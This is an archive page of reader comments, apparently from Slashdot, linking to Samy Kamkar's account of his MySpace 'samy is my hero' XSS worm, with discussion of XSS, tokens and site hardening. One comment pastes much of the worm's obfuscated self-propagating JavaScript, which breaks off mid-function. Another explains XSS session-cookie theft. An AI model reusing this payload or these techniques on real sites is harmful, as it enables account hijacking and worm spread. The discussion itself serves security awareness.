Domain: namb.la
Stories and comments across the archive that link to namb.la.
Comments · 35
-
Samy is my hero
a 'security' guy
You know this guy is Samy Kamkar, the hacker who also unleashed the first-ever XSS worm on the world that infected a million MySpace profiles in a matter of hours...
Tomorrow I happen to attend a meeting of OWASP where Samy will speak about the latest XSS exploits, other JavaScript tricks, and other things (like a nice new method of NAT penetration)... I could say the title 'security guy' is earned by him for finding some great hacks and sharing them with the world, and even taking time to talk about it in person to the open source community.
but most of all, Samy is my hero -
Re:Wait, what?
Letting laymen edit HTML always worked out for the best.
Although the Myspace Worm has to be one of the most hilarious things I've ever read.
-
Use a Myspace Worm for more Lulz
I'll start by submitting the e-mail addresses of everyone I dislike and claim to be their parents and say that they are lieing about their age. Another well thought out government idea.
A true geek would automate this. Technical explanation of The MySpace Worm. Also called the "Samy worm" or "JS.Spacehero worm" -
Re:Can someone explain this for me...?
No it can't. The same-origin policy prevents javascript from one website from accessing objects returned from another website. Kinda. It's complicated and there are occasionally ways to hack it, but generally speaking when same-origin is working, the token is a pretty secure mechanism.
The best way to break tokens like that is to find some XSS on the site you're attacking -- that allows you to get javascript running within the domain of the remote site. /Then/ you can do what you described above and have your javascript access the token and return it. That's what Samy did with the SamyIsMyHero worm.
http://en.wikipedia.org/wiki/Same_origin_policy
http://namb.la/popular/tech.html -
Re:Restitution?but there's no motivation for disclosing vulnerabilities. When you see an insecure physical lock, do you pick it and enter the building? After all there's no motivation for disclosing insecure locks. That's why you start breaking and entering in the first place I suppose?
The guy spent far more time and effort bypassing myspace's protections than you'd spend picking a few locks. -
Re:Restitution?I think the better allegory here is that somebody leaves all their savings in a pile in the driveway, Not at all. More like they leave their savings indoors, in their home, and lock the door with several locks. Samy spent considerable time bypassing several different protections of myspace, he spent far more time and ingenuity than you'd need to pick a few locks. It's all documented. If we are to compare with piles of cash, he certainly picked several locks to get at it. With that analogy it's a very clear case of breaking and entering.
-
Re:He wouldn't have been caught...Judging from his personal website, I'd say that he would know how to stay anonymous if he chose to. He didn't even think that it would cause trouble:
I have hit 1,000,000+ users. In less than 20 hours, I've hit over 1/35th of all myspace users. Every request is from a unique, living, and logged in user. I refresh once more and now see nothing but a message that my profile is down for maintenance. I messed up, didn't I. I'm now more afraid and decide I am never doing anything even near illegal ever again. To get my mind off of everything, I begin downloading a copy of the latest Nip/Tuck episode. 1 hour later, 7:05 pm: A friend tells me that they can't see their profile. Or anyone else's profile. Or any bulletin boards. Or any groups. Or their friends requests. Or their friends. Nothing on myspace works. Messages are everywhere stating that myspace is down for maintenance and that the entire myspace crew is there working on it. I ponder whether I should drive over to their office and apologize. Another attempt to free my mind of worry, I go back to watching some episodes of The OC which I downloaded a few days earlier. File sharing rocks. 2.5 hours later, 9:30 pm: I'm told that everything on myspace seems to be working again. My girlfriend's profile, along with many, many others, still say "samy is my hero", however the actual self-propagating program is gone. I'm relieved that it's back up as they can't claim damages for any downtime past this second if everything is in fact working properly. 10 minutes later, 9:40 pm: I haven't heard from anyone at myspace or FOX. A few minutes later, my girlfriend calls, I pick up, and she says to me, "you're my hero". I don't actually get it until about three hours later.
-
Re:Exactly. He's not exactly blameless.
Isn't a script kiddie someone who launches other peoples' exploits that are discoverable against targets?
I don't like what this guy did, but it was clever and certainly not someone a script kiddie can do. Here's his explanation of his worm and how it worked. Clearly it took a lot of original effort and thought to do it.
D -
Re:Idea
I can tell you that before I saw his account of the situation, I wanted to let anyone do anything they wanted on my fledgling social networking site. I agree, this account is required readng for anyone wanting to create a community site.
What he did and how much time and effort he was willing to put into it shocked the heck out of me and caused me to put very strong anti-JavaScript code into my site. I didn't want to do it because I wish we could have given people the freedom to be creative in that arena. But after I saw what he did I felt I had no choice.
That being said, the reality is that he did an enormous amount of damage. He says things were back to normal at myspace within a few hours, but I remember at the time that the system was highly unstable for a few weeks after the incident was supposedly cleaned up.
From the point of view of the folks who ran myspace, what he did caused untold misery and pain for many people and i think he deserved a heavy punishment.
Not that I really think he will avoid using the Internet for social purposes no matter what the courts say. And I really don't think probation or community service seems like that heavy a punishment for someone who deliberately disrupted a service, however disliked in some quarters, that many people rely on.
Samy and people like him make it a difficult, miserable and thankless task to create services that hopefuly will do nice things for people. They make people like me waste our time trying to figure out how to restrict things, when we'd much rather produce fun features people will use and enjoy. Samy's account made me laugh, but it also made me furious that human nature is so pointlessly destructive.
I hope the sentence deters people from doing similar things.
I wonder how much he had to pay Myspace. Does anyone know?
D -
Re:The wording of this article is horribly biasedA proof of concept does something. That's how you get your proof. The thing is that it doesn't do something malicious. In the case of MySpace, that would probably include mangling of a profile or *deleting* your friends list. Anyway, I think that this explains his true intent. From http://namb.la/popular/ 7 hours later, 8:35 am: You have 74 friends and 221 friend requests. Woah. I did not expect this much. I'm surprised it even worked.. 200 people have been infected in 8 hours. That means I'll have 600 new friends added every day. Woah.
1 hour later, 9:30 am: You have 74 friends and 480 friend requests. Oh wait, it's exponential, isn't it. Shit. -
Re:No substanceGuess what?
Samy's worm did exactly that.
Relevent extract from his fascinating account, well worth reading in its entirety:9) Finally we can do a POST! However, when we send the post it never actually adds a friend. Why not? Myspace generates a random hash on a pre-POST page (for example, the "Are you sure you want to add this user as a friend" page). If this hash is not passed along with the POST, the POST is not successful. To get around this, we mimic a browser and send a GET to the page right before adding the user, parse the source for the hash, then perform the POST while passing the hash.
I must say I was quite impressed, not to mention frightened half to death, by what Samy went through to create his worm. It was not a simple task at all. I had thought before that nobody would waste their time doing something like this; I was, of course, wrong.
The consequence of his story is that I changed my own social networking site to become a lot more secure. I didn't like doing it because I would have preferred to let people do what they want, but that artilce was a real eye opener as to how dangerous that would have been.
D -
Re:I don't get XSS
There is a tension between what users want to do that's legitimate, and what users can do maliciously.
For example, I'm developing a myspace-like system, with which I am presently grappling with these issues.
Ideally, I'd like to give users perfect creative freedom to do whatever they want on their profiles and online community pages. After all, they should be able to express themselves, no?
So before these attacks became well-known, it was a perfectly reasonable stance to say that we should NOT filter user input, that we should let people express themselves as they want. That's been my position, before I learned about this problem.
Before you laugh, even computing greats have made similar mistakes. RMS, of Emacs, GNU and GPL fame, used to rail against people using passwords on their accounts. He had no password on his account on the MIT AI ITS machine, which was accessible through the ARPANet. Theoretically, a lot of bad things could have happened to him, but they didn't because yesterday's ARPANet users had respect for him and people like him. The administrators eventually forced him, pretty much at gunpoint, to set a password. Of course he told everyone what it was. Such was the wonderful culture of the AI lab.
I don't know what RMS has done personally, but I'm sure he has a password on his account now, and I'm sure that fact greatly saddens him. I am sad about it myself. I don't like this new world of poison users and XSS and spyware and so on, but unfortunately you have to accept it as a fact of life.
My own tipping point, which showed me how important this issue was, was this fellow. I actually like him, or at least his writing style. But what he did to myspace makes my blood run cold. I realized after that that I simply could not allow people to do whatever they wanted.
Another important thing to note is that preventing XSS is not as simple as it seems. In fact, preventing it may be just plain impossible if we don't want to prevent people from doing things like showing videos and Flash, with the OBJECT tag. There are apparently huge security holes in allowing it, but if you don't, then you have a world without music or video. If anyone has tips on securing this, please reply to this and let us all know. I was thinking that it might be necessary to allow only certain URLs but that seems too draconian if there's any way to avoid it.
If we disregard that particular risk, it's still very difficult to prevent JavaScript from sneaking in. This site, unfortunatley Slashdotted together with the article, is an excellent example of how hard it is to deal with these problems, and how subtle and persistent the enemy is.
Anyway, I've spent two solid days figuring out ways to deal with all the exploits Rsnake deals with in the above document. I'm about done now, and I'm confident that my system will stand tall against most known attacks. But there's always something around the corner, and I guess that's what makes being a security guy interesting.
Personally, I really resent the time I have to waste on restricting people's freedoms just because this is a cruel and crazy world out there of people who wish you ill, just because you happen to design systems. I love to design systems, and this new project is the best thing I've ever worked on, but I shake my head over what this world has become.
And then I go back to work.
D -
Re:Isn't that XSS??
would you happen to know of any other types of attack that XSS might enable?
Howabout the myspace worm?
Cross site scripting is really great for simple session hijacking. Php stores a cookie called PHPSESSID by default with your unique session identifier. All of the important bits of your session (username, password, whatever else they're storing) are stored on the server. If someone can guess (very difficult) or steal (with xss very easy) that identifier, they can impersonate you and have access to whatever information that entails on the vulnerable website. If it's phpBB, they can elevate privileges to become a moderator/admin. If it's Amazon they can see your credit card number. So yes, it's great for phishers.
Also, an interesting note about xss: it's a shotgun approach. When an attacker exploits an xss vulnerability, they will steal the cookies of everybody who views that page, not just you. -
Re:In the minority again
Well, it's a way to connect with people. If you're satisfied with the people you have, then a social networking site probably looks pretty stupid. You wouldn't surf match.com if you weren't looking for a date, and you wouldn't be on myspace if you weren't looking for people to connect with.
If you are, social networking sites can seem pretty neat since there are a lot of people there, some of who are interesting.
What's really appealing about myspace is that although most people wildly misuse their "space", it is a place where they can be creative and put out things that they like. Those things are not what most programmers think they should like, but the point is that they can be in control and there's plenty of help available to make their profile look as they want it to.
Human beings in general seem to be more interested in whether something looks "cool" than whether you can read it or not. And that's fine, because they are people and they are expressing themselves. And on myspace, it's relatively easy to find them, which is where I think social networking has a huge advantage over standalone blogs.
Someone who put hours and hours into breaking myspace has a pretty interesting perspective on it. Funny, too. I'm Popular.
I'm doing my own site, aimed at more mature people than myspace, but it's not ready yet. To show social networking with an adult flair, I consider my best competition to be Tribe. It used to have adult profiles and ... interesting ... pictures, but sadly their corporate backers decided that wasn't a brainy scheme and removed it. But it's still pretty much social networking for people who have passed the Myspace stage.
D -
Re:Script tags isn't enough.
you may want to check Samy's hack of Myspace
While he didn't use it for anything really detrimental, he more than likely could have, especially when you see the bunch of code he managed to cram in.
-
I'm pretty sure......that my AJAX-based Slashdot posting console is secure.
But most of all, samy is my hero.
-
Re:US needs to be more like Europe
Yeah, unless you're on MySpace.
-
And still get pwn3d
Does nobody remember the "Samy is my hero" business that took down MySpace?
Story: http://namb.la/popular/
Technical Explanation: http://namb.la/popular/tech.html
He did all of his GETs and POSTs using XML-HTTP -
And still get pwn3d
Does nobody remember the "Samy is my hero" business that took down MySpace?
Story: http://namb.la/popular/
Technical Explanation: http://namb.la/popular/tech.html
He did all of his GETs and POSTs using XML-HTTP -
Samy is my Hero
This is how you use AJAX to create XMLHttpRequest instances.
The Story: http://namb.la/popular/
The Explanation: http://namb.la/popular/tech.html -
Samy is my Hero
This is how you use AJAX to create XMLHttpRequest instances.
The Story: http://namb.la/popular/
The Explanation: http://namb.la/popular/tech.html -
Re:it was funny
samy is my hero! (it's a great story, check out the technical explanation as well
...) -
Re:it was funny
samy is my hero! (it's a great story, check out the technical explanation as well
...) -
Rupert is just jealous.No one has added him as to their friends list. Of course he's going to get a bit cranky.
However samy is my hero.
-
Re:All things may be equal.
Most people are on myspace because their friends are all on myspace, and they value that very time-consuming to set up network.
They also know that's where the hot girls and buff guys are.
So it remains popular even though its software engineering is truly abysmal.
D -
XML
If by useful you mean allowing MySpace to get pwn3ed, then yes, AJAX is useful.
Remember the Samy worm?
http://namb.la/popular/tech.html
He used html, java, dhtml, xml...
Especially XML
AJAX seems to be like Darth Vader... Powerful, yet dangerous. -
Re:But most of all...
The parent is, of course, refering to the guy that wrote a worm (using HTML + Javascript) to get a lot of MySpace friends. He's even written down how he did it. Quite an interesting read.
-
How he did it
From the horses's mouth:
http://namb.la/popular/tech.html -
The exploit itself
Taken from http://namb.la/popular/tech.html this is the exploit he used:
<div id=mycode style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}cat ch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromU RL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.my space.com'){document.location='http://www.myspace. com'+location.pathname+location.search}else{if(!M) {getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.repl ace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.repla ce('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ ,BH,true);if(BJ=='POST'){J.setRequestHeader('Conte nt-Type','application/x-www-form-urlencoded');J.se tRequestHeader('Content-Length',BK.length)}J.send( BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=fals e}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE= AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes', '</td>');AG=AG.substring(61,AG.length);if(AG.index Of('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']= 'Preview';AS['interest']=AG;J=getXMLObj();httpSend ('/index.cfm?fuseaction=profile.previewInterests&M ytoken='+AR,postHero,'POST',paramsToString(AS))}}} function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']= 'Submit';AS['interest']=AG;AS['hash']=getHiddenPar ameter(AU,'hash');httpSend('/index.cfm?fuseaction= profile.processInterests&Mytoken='+AR,nothing,'POS T',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendI D='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,get Home,'GET');xmlhttp2=getXMLObj();httpSend2('/index .cfm?fuseaction=invite.addfriend_verify&friendID=1 1851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if -
Re:This is *not* XSS
And now for the nit-picking minute...
If you read the technical explanation of the worm, you will see (item 8) that he had to add an extra redirection go from profile.myspace.com to www.myspace.com.
The cross-site part is not the main part of the worm. But still...
-
Re:Here's the Guys Explanation of his code
Here is his explanation
Yeah, right. There's no way you're tricking me into going to some page with a suspicious URL like that! -
Here is the source:
The source and the explanation.
-
samy is my hero
Turns out that he just used the fact that (not trying to start a flame war here) IE and some versions of Safari allow javascript tags within CSS.
Samy's info on the topic (coral)
His explanation of how it works -
Here's the Guys Explanation of his code
Here is his explanation -- it goes over the transformations he had to make to the program to smuggle it past Myspace's filters.
And here is his version of the story.
He comes off as a sweet practical joker. But maybe that's just b.s. that he cooked up after he realized he might have some 'splainin' to do.
Also, his site really is "namb.la" -- he's making some sort of joke at NAMBDLA's expense, which is pretty suspect, I think. -
Here's the Guys Explanation of his code
Here is his explanation -- it goes over the transformations he had to make to the program to smuggle it past Myspace's filters.
And here is his version of the story.
He comes off as a sweet practical joker. But maybe that's just b.s. that he cooked up after he realized he might have some 'splainin' to do.
Also, his site really is "namb.la" -- he's making some sort of joke at NAMBDLA's expense, which is pretty suspect, I think.